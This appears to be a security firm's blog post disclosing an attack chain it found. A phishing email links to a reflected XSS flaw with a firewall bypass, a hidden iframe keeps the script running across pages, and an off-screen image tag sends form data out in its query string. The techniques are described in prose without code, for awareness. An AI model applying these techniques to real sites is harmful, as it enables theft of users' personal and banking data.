Firesand has identified a sophisticated hack that would have bypassed a client’s Web Application Firewall and caused serious damage.
In this case, the hacker sent a phishing email referencing a real promotion that the business was running. Within this email, a WAF bypass technique was used to deliver malicious code, which the victim clicks.
In this attack, the website was tricked into delivering malicious content to the user via a Refected XSS (Cross Site Scripting) vulnerability. This takes external input, does not validate it and reflects it back to the user. As a result, the malicious code at the end of the link is read by the website’s servers and then delivered back to the user’s browser.
At this stage, the victim’s browser receives the malicious code and executes it. The malicious script creates an iframe and embeds the target website. It has an ‘onload’ event handler, meaning it executes every time a link and the page is loaded. This handler is configured to reload the attack onto every page, and it’s set up so the user cannot see this.
Under this method, extra code can seamlessly be added and from this, a copy of the data is sent from the victim’s browser to the target website. This data could include personal information such as banking details.
To obtain this data, an SOP bypass is conducted, tricking the browser into doing that. An image tag is embedded into the web page but with a style that positions the image off the viewable area of the screen. The SRC tag attribute is set to the web server's IP address and at the end of the SRC, a query string is added within a URL.
When the browser attempts to download the new image using that URL a blank ‘image not found’ icon is loaded onto the page. As this is positioned off screen the user doesn’t see this. The web server receives all the data and the hacker can see this too.
Finding this high-risk vulnerability highlights the importance of ensuring that websites and systems are regularly monitored for any potential threats. Any small update can cause problems so it is essential to regularly check for security threats.